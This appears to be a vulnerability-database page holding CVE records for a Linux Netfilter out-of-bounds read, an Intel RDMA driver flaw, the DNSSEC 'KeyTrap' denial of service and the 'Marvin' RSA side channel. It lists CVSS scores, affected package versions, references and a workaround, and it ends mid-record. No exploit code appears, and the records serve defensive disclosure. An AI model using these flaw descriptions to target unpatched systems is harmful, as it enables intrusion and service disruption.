EPSS score ?
Summary
A flaw was found in the Netfilter subsystem in the Linux kernel. The nfnl_osf_add_callback function did not validate the user mode controlled opt_num field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-39189 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2226777 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T18:02:06.808Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39189" }, { "name": "RHBZ#2226777", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226777" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.rt7.342.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-08-30T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw was found in the Netfilter subsystem in the Linux kernel. The nfnl_osf_add_callback function did not validate the user mode controlled opt_num field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-15T17:03:07.560Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-39189" }, { "name": "RHBZ#2226777", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2226777" } ], "timeline": [ { "lang": "en", "time": "2023-07-25T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-08-30T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: netfilter: nftables out-of-bounds read in nf_osf_match_one()", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected Passive OS Fingerprinting match module (`xt_osf`) from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-39189", "datePublished": "2023-10-09T17:57:44.776Z", "dateReserved": "2023-07-25T16:01:14.835Z", "dateUpdated": "2024-11-15T17:03:07.560Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-25775
Vulnerability from cvelistv5
Published
2023-08-11 02:36
Modified
2024-08-02 11:32
Severity ?
EPSS score ?
Summary
Improper access control in the Intel(R) Ethernet Controller RDMA driver for linux before version 1.9.30 may allow an unauthenticated user to potentially enable escalation of privilege via network access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Ethernet Controller RDMA driver for linux |
Version: before version 1.9.30 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:32:12.241Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html", "tags": [ "x_transferred" ], "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230915-0013/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Intel(R) Ethernet Controller RDMA driver for linux", "vendor": "n/a", "versions": [ { "status": "affected", "version": "before version 1.9.30" } ] } ], "descriptions": [ { "lang": "en", "value": "Improper access control in the Intel(R) Ethernet Controller RDMA driver for linux before version 1.9.30 may allow an unauthenticated user to potentially enable escalation of privilege via network access." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "escalation of privilege", "lang": "en" }, { "cweId": "CWE-284", "description": "Improper access control", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-08-11T02:36:57.397Z", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html", "url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00794.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230915-0013/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html" } ] } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2023-25775", "datePublished": "2023-08-11T02:36:57.397Z", "dateReserved": "2023-02-24T04:00:02.082Z", "dateUpdated": "2024-08-02T11:32:12.241Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-50387
Vulnerability from cvelistv5
Published
2024-02-14 00:00
Modified
2024-08-02 22:16
Severity ?
EPSS score ?
Summary
Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:16:46.692Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.athene-center.de/aktuelles/key-trap" }, { "tags": [ "x_transferred" ], "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "tags": [ "x_transferred" ], "url": "https://www.theregister.com/2024/02/13/dnssec_vulnerability_internet/" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39367411" }, { "tags": [ "x_transferred" ], "url": "https://www.securityweek.com/keytrap-dns-attack-could-disable-large-parts-of-internet-researchers/" }, { "tags": [ "x_transferred" ], "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "tags": [ "x_transferred" ], "url": "https://news.ycombinator.com/item?id=39372384" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "tags": [ "x_transferred" ], "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "tags": [ "x_transferred" ], "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-50387" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219823" }, { "tags": [ "x_transferred" ], "url": "https://www.athene-center.de/fileadmin/content/PDF/Technical_Report_KeyTrap.pdf" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240307-0007/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the \"KeyTrap\" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T16:14:16.780094", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.athene-center.de/aktuelles/key-trap" }, { "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "url": "https://kb.isc.org/docs/cve-2023-50387" }, { "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "url": "https://www.theregister.com/2024/02/13/dnssec_vulnerability_internet/" }, { "url": "https://news.ycombinator.com/item?id=39367411" }, { "url": "https://www.securityweek.com/keytrap-dns-attack-could-disable-large-parts-of-internet-researchers/" }, { "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "url": "https://news.ycombinator.com/item?id=39372384" }, { "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-50387" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-50387" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219823" }, { "url": "https://www.athene-center.de/fileadmin/content/PDF/Technical_Report_KeyTrap.pdf" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "url": "https://security.netapp.com/advisory/ntap-20240307-0007/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-50387", "datePublished": "2024-02-14T00:00:00", "dateReserved": "2023-12-07T00:00:00", "dateUpdated": "2024-08-02T22:16:46.692Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6240
Vulnerability from cvelistv5
Published
2024-02-04 14:11
Modified
2024-11-15 15:12
Severity ?
EPSS score ?
Summary
A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1882 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2758 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3414 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3421 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3618 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3627 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6240 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2250843 | issue-tracking, x_refsource_REDHAT | |
https://people.redhat.com/~hkario/marvin/ | ||
https://securitypitfalls.wordpress.com/2023/10/16/experiment-with-side-channel-attacks-yourself/ |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.5.1.rt7.346.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:18.112Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:1881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1881" }, { "name": "RHSA-2024:1882", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1882" }, { "name": "RHSA-2024:2758", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2758" }, { "name": "RHSA-2024:3414", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3414" }, { "name": "RHSA-2024:3421", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3421" }, { "name": "RHSA-2024:3618", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3618" }, { "name": "RHSA-2024:3627", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3627" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6240" }, { "name": "RHBZ#2250843", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250843" }, { "tags": [ "x_transferred" ], "url": "https://people.redhat.com/~hkario/marvin/" }, { "tags": [ "x_transferred" ], "url": "https://securitypitfalls.wordpress.com/2023/10/16/experiment-with-side-channel-attacks-yourself/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240628-0002/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-6240", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-11-07T21:11:40.911308Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-07T21:11:50.169Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.5.1.rt7.346.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-553.5.1.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.16.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.16.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/a:redhat:rhel_eus:9.0::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.101.1.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::nfv", "cpe:/a:redhat:rhel_eus:9.0::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.101.1.rt21.173.el9_0", "versionType": "rpm" } ] }, { "collectionURL": 